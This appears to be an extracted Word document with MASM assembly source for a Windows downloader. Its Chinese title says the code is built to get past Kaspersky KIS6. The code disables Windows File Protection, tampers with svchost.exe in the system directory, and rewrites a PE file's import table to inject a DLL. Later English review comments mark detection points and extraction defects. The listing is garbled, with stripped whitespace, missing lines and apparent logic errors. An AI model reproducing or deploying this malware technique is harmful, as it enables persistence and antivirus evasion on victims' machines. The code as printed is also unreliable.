修改引入表打造穿透KIS6的下载者Word文件下载.docx
.modelflat,stdcall
optioncasemap:
none
;
>
include
include
windows.inc
kernel32.inc
includelibkernel32.lib
advapi32.inc
includelib
advapi32.lib
数据段
.data
dwWriten
dd0
zero
dllname
db'
sec.dll'
0
funpara
db0,0,'
SecConfig'
PE_Header
IMAGE_NT_HEADERS
<
0>
My_Section
IMAGE_SECTION_HEADER
My_Dll
MAGE_IMPORT_DESCRIPTOR<
My_DllName
IMAGE_IMPORT_BY_NAME
<
.const
Head_Len
equ
sizeofIMAGE_NT_HEADERS+sizeofIMAGE_SECTION_HEADER
宏
CTEXT
MACROy:
VARARG
LOCALsym
CONSTsegment
ifidni<
y>
<
symdb0
else
symdby,0
endif
CONSTends
exitm<
offsetsym>
ENDM
.code
disablewfp.asm
;-----------------------------------------------------------------------
; Program entry point (MASM, .model flat, stdcall per the file header).
; Sequence, as stated by the listing's own comments: disable file
; protection (_Sfcoff), create the DLL (CreateDll), rename/replace the
; target file (SetFile), then rewrite the target PE's import table
; (Modimport), and exit via ExitProcess.
; _Sfcoff and CreateDll are not defined anywhere in this listing (the
; bare "disablewfp.asm" line above looks like a stripped include) -- their
; behaviour cannot be confirmed from here.
; Defender note: each step visible on this page (file protection turned
; off, an executable in the system directory renamed and replaced, an
; on-disk PE import table rewritten) is a distinct, detectable event;
; file-integrity and WFP/SFC tamper alerts cover them.
; NOTE(review): the extraction stripped whitespace and the ';' from the
; Chinese comment lines, so this block does not assemble as printed.
;-----------------------------------------------------------------------
start:
call_Sfcoff
关闭文件保护                            ; (original comment) disable file protection
callCreateDll
callSetFile
callModimport;
改写PE文件引入表                        ; (original comment) rewrite the PE file's import table
exit:
invokeExitProcess,NULL                  ; exit code 0 (NULL)
对目标文件进行更名
SetFileproc
localdestpath[255]:
BYTE
localtmppath[255]:
invokeRtlZeroMemory,addrdestpath,255
invokeRtlZeroMemory,addrtmppath,255
invokeGetSystemDirectory,addrdestpath,255
invokeGetSystemDirectory,addrtmppath,255
invokelstrcat,addrdestpath,CTEXT("
\svchost.exe"
)
invokelstrcat,addrtmppath,CTEXT("
\suchost.exe"
invokeMoveFile,addrdestpath,addrtmppath
invokeCopyFile,addrtmppath,addrdestpath,FALSE
ret
SetFileendp
RVA转换成磁盘文件中的偏移
;-----------------------------------------------------------------------
; DWORD RVAToOffset(LPVOID pFileMap, DWORD RVA)
; Generic PE helper: converts an RVA to a raw file offset by walking the
; section table of the image mapped at pFileMap
; (IMAGE_DOS_HEADER.e_lfanew -> IMAGE_NT_HEADERS -> section headers).
; In:    pFileMap = base of the mapped file, RVA = address to convert
; Out:   eax = file offset when the RVA lies in some section's
;        [VirtualAddress, VirtualAddress+SizeOfRawData) range;
;        otherwise eax = RVA unchanged (the "nothing" fall-through).
; Regs:  edi, esi, edx, ecx are preserved by the PROC "uses" list.
; NOTE(review): this listing is an extraction with whitespace stripped
; and lines apparently lost -- two ".if" blocks but only one ".endif",
; and the "assume esi:" prefix before "ptrIMAGE_NT_HEADERS" is missing.
; Do not assume it assembles or behaves as printed.
;-----------------------------------------------------------------------
RVAToOffsetPROCusesediesiedxecxpFileMap:
DWORD,RVA:
DWORD
movesi,pFileMap                         ; esi = image base (IMAGE_DOS_HEADER)
assumeesi:
ptrIMAGE_DOS_HEADER
addesi,[esi].e_lfanew                   ; esi = &IMAGE_NT_HEADERS
ptrIMAGE_NT_HEADERS                     ; (review) "assume esi:" lost in extraction
movedi,RVA;
edi==RVA
movedx,esi
addedx,sizeofIMAGE_NT_HEADERS           ; edx = first IMAGE_SECTION_HEADER
movcx,[esi].FileHeader.NumberOfSections
movzxecx,cx                             ; ecx = section count, zero-extended from 16 bits
assumeedx:
ptrIMAGE_SECTION_HEADER
.whileecx>
0;
checkallsections
.ifedi>
=[edx].VirtualAddress                   ; RVA >= section start?
moveax,[edx].VirtualAddress
addeax,[edx].SizeOfRawData              ; eax = section end (by raw size)
.ifedi<
eax;
Theaddressisinthissection
subedi,eax                              ; NOTE(review): eax is VA+SizeOfRawData here, so this gives RVA-(VA+SizeOfRawData); an RVA->offset conversion subtracts the section's VirtualAddress. Either a "mov eax,[edx].VirtualAddress" line was dropped by the extraction or this is a defect -- verify against a reference implementation.
moveax,[edx].PointerToRawData
addeax,edi;
eax==fileoffset
ret                                     ; PROC epilogue restores the "uses" registers
.endif                                  ; (review) second .endif for the outer .if is missing in this extraction
addedx,sizeofIMAGE_SECTION_HEADER       ; next section header
dececx
.endw
nothing                                 ; (original comment) no section matched
moveax,edi                              ; return the RVA unchanged
RVAToOffsetendp
Modimportproc
localszpath[255]:
LOCALhFile:
HANDLE
LOCALdwPE_Header_OffSet:
DWORD
LOCALdwFileReadWritten:
LOCALdwMySectionOffSet:
LOCALdwLastSection_SizeOfRawData:
LOCALdwLastSection_PointerToRawData:
LOCALhMapping:
LOCALpMapping:
LOCALoImport[520]:
LOCALoImportlen
LOCALChrarctics
LOCALdllnamelen:
LOCALfunparalen:
LOCALirva:
invokeRtlZeroMemory,addroImport,520
invokeRtlZeroMemory,addrszpath,255
nvokelstrcat,addrszpath,CTEXT("
test.exe"
打开文件:
invokeCreateFile,addrszpath,GENERIC_READorGENERIC_WRITE,\
FILE_SHARE_READorFILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL
.ifeax==INVALID_HANDLE_VALUE
jmpErr_CreateFile_Exit
.endif
movhFile,eax
创建内存映射文件
invokeCreateFileMapping,hFile,NULL,PAGE_READONLY,0,0,0
.ifeax!
=NULL
movhMapping,eax
invokeMapViewOfFile,hMapping,FILE_MAP_READ,0,0,0
movpMapping,eax
****************************************
读取PE文件头
invokeSetFilePointer,hFile,3ch,0,FILE_BEGIN
invokeReadFile,hFile,addrdwPE_Header_OffSet,4,addrdwFileReadWritten,NULL
invokeSetFilePointer,hFile,dwPE_Header_OffSet,0,FILE_BEGIN
invokeReadFile,hFile,addrPE_Header,Head_Len,addrdwFileReadWritten,NULL
PE文件有效性检查
.if[PE_Header.Signature]!
=IMAGE_NT_SIGNATURE
jmpExit
判断是否有足够空间存储新节:
movzxeax,[PE_Header.FileHeader.NumberOfSections]
得到添加新节前有多少个节:
movecx,28h
28h=sizeofIMAGE_SECTION_HEADER
mulecx
;
eax=NumberOfSections*sizeofIMAGE_SECTION_HEADER
addeax,dwPE_Header_OffSet
eax=eax+PE文件头偏移
addeax,18h
18h=sizeofIMAGE_FILE_HEADER
movzxecx,[PE_Header.FileHeader.SizeOfOptionalHeader]
addeax,ecx
eax=eax+sizeofIMAGE_OPTIONAL_HEADER
addeax,28h
添加一个新节的大小
.ifeax>
[PE_Header.OptionalHeader.SizeOfHeaders]
**************************************************
计算新节的偏移地址:
movzxeax,[PE_Header.FileHeader.NumberOfSections]
movecx,28h
addeax,4h
4h=sizeof"
PE\0\0"
addeax,dwPE_Header_OffSet
addeax,sizeofIMAGE_FILE_HEADER
addeax,sizeofIMAGE_OPTIONAL_HEADER
movdwMySectionOffSet,eax
现在得到了我们的新节的偏移地址
push[PE_Header.OptionalHeader.SizeOfImage]
pop[My_Section.VirtualAddress]
重构引入表,在文件的最后写入我们的新节:
读取原始引入表数据,读取正确的不带0的引入表
movedi,[PE_Header.OptionalHeader.DataDirectory[sizeofIMAGE_DATA_DIRECTORY].VirtualAddress]
invokeRVAToOffset,pMapping,edi
movedi,eax
invokeSetFilePointer,hFile,edi,0,FILE_BEGIN
不读空的结束符
movoImportlen,0
leaedi,oImport
calclen:
invokeReadFile,hFile,edi,4,addrdwFileReadWritten,NULL
movebx,[edi]
testebx,ebx
jzcalcover
addedi,4
addoImportlen,4
jmpcalclen
calcover:
写入dll名称,定位到最后一节的rawoffset处
moveax,dwMySectionOffSet
subeax,18h
invokeSetFilePointer,hFile,eax,0,FILE_BEGIN
invokeReadFile,hFile,addrdwLastSection_SizeOfRawData,4,addrdwFileReadWritten,NULL
invokeReadFile,hFile,addrdwLastSection_PointerToRawData,4,addrdwFileReadWritten,NULL
movebx,dwLastSection_SizeOfRawData
addebx,dwLastSection_PointerToRawData
invokeSetFilePointer,hFile,ebx,0,FILE_BEGIN
push0
leaeax,dwFileReadWritten
pusheax
moveax,sizeofdllname
movdllnamelen,eax
pusheax;
[My_Section.SizeOfRawData]
leaeax,dllname
pushhFile
callWriteFile
写入IMAGE_THUNK_DATA
pusheax
moveax,sizeoffunpara
addeax,sizeoffunpara
movfunparalen,eax
leaeax,funpara
写入IMAGE_THUNK_DATA的RVA
moveax,[My_Section.VirtualAddress]
addeax,dllnamelen
movirva,eax
invokeWriteFile,hFile,addrirva,4,addrdwFileReadWritten,NULL
写入一个空IMAGE_THUNK_DATA的RVA作为结尾
invokeWriteFile,hFile,addrzero,4,addrdwFileReadWritten,NULL
写入原引入表数据
movecx,oImportlen
invokeWriteFile,hFile,addroImport,ecx,addrdwFileReadWritten,NULL
构造新引入的DLL的IMAGE_IMPORT_DESCRIPTOR
addeax,funparalen
mov[My_Dll.OriginalFirstThunk],eax
mov[My_Dll.TimeDateStamp],0FFFFFFFFh
mov[My_Dll.ForwarderChain],0FFFFFFFFh
movebx,[My_Section.VirtualAddress]
mov[My_Dll.Name1],ebx
mov[My_Dll.FirstThunk],eax
写入新引入的DLL的IMAGE_IMPORT_DESCRIPTOR
invokeWriteFile,hFile,addrMy_Dll,20,addrdwFileReadWritten,NULL
写入以0结尾的空IMAGE_IMPORT_DESCRIPTOR
push20
popecx
fillzero:
pushecx
invokeWriteFile,hFile,addrzero,1,addrdwFileReadWritten,NULL
dececx
testecx,ecx
jnzfillzero
填充我们自己的节的信息:
movdwordptr[My_Section.Name1],"
ler."
movdwordptr[My_Section.Name1]+4,"
co"
mov[My_Section.Misc.VirtualSize],1000h
moveax,[My_Section.Misc.VirtualSize]
moveax,dl